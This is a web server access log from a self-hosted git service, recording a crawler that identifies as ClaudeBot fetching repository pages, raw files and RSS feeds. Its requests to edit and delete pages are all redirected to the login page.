[Length 9865] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:11:01:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.tsx?display=rendered" [Client 216.73.216.188] [Length 10872] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:11:02:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/status.json?display=rendered" [Client 216.73.216.188] [Length 10893] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:11:02:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fhtml%2Findex.tsx" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:11:02:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml%2Fstatus.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:30 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/robots.txt" [Client 216.73.216.188] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/database.py" [Client 216.73.216.188] [Length 12330] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/project.nuget.cache" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/project.nuget.cache" -[15/Feb/2026:12:08:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/project.assets.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/project.assets.json" -[15/Feb/2026:12:08:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/python3" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/python3" -[15/Feb/2026:12:08:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" -[15/Feb/2026:12:08:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/components/Header.tsx" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/components/Header.tsx" -[15/Feb/2026:12:08:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" -[15/Feb/2026:12:08:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache?display=rendered" [Client 216.73.216.188] [Length 11164] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/app/models.py" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/app/models.py" -[15/Feb/2026:12:08:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" [Client 216.73.216.188] [Length 9858] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" -[15/Feb/2026:12:08:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" -[15/Feb/2026:12:08:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/Properties/launchSettings.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/Properties/launchSettings.json" -[15/Feb/2026:12:08:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/app/models.py" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/app/models.py" -[15/Feb/2026:12:08:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs?display=source" [Client 216.73.216.188] [Length 12034] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" [Client 216.73.216.188] [Length 962] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/css" [Client 216.73.216.188] [Length 10152] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" [Client 216.73.216.188] [Length 983] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/Properties/launchSettings.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/assets/css/style.css" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/Properties/launchSettings.json" -[15/Feb/2026:12:08:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/obj/project.nuget.cache" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/assets/css/style.css" -[15/Feb/2026:12:08:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/obj/project.nuget.cache" -[15/Feb/2026:12:08:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache?display=rendered" [Client 216.73.216.188] [Length 11240] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/obj/project.assets.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/obj/project.nuget.cache" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/obj/project.assets.json" -[15/Feb/2026:12:08:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/obj/project.assets.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/obj/project.nuget.cache" -[15/Feb/2026:12:08:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/assets/css/style.css" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/obj/project.assets.json" -[15/Feb/2026:12:08:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/assets/css/style.css" -[15/Feb/2026:12:08:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache?display=rendered" [Client 216.73.216.188] [Length 11188] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" [Client 216.73.216.188] [Length 9852] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" [Client 216.73.216.188] [Length 14350] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" [Client 216.73.216.188] [Length 977] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig?display=rendered" [Client 216.73.216.188] [Length 11258] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" [Client 216.73.216.188] [Length 9867] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache?display=source" [Client 216.73.216.188] [Length 11377] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/obj/Debug" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" [Client 216.73.216.188] [Length 9871] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/obj/Debug" -[15/Feb/2026:12:08:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" [Client 216.73.216.188] [Length 65] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" [Client 216.73.216.188] [Length 1001] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" [Client 216.73.216.188] [Length 10456] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/static/css/style.css" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" [Client 216.73.216.188] [Length 1013] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/static/css/style.css" -[15/Feb/2026:12:08:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/static/css/style.css" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" [Client 216.73.216.188] [Length 9870] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/static/css/style.css" -[15/Feb/2026:12:08:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/include" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" [Client 216.73.216.188] [Length 9878] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:08:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" 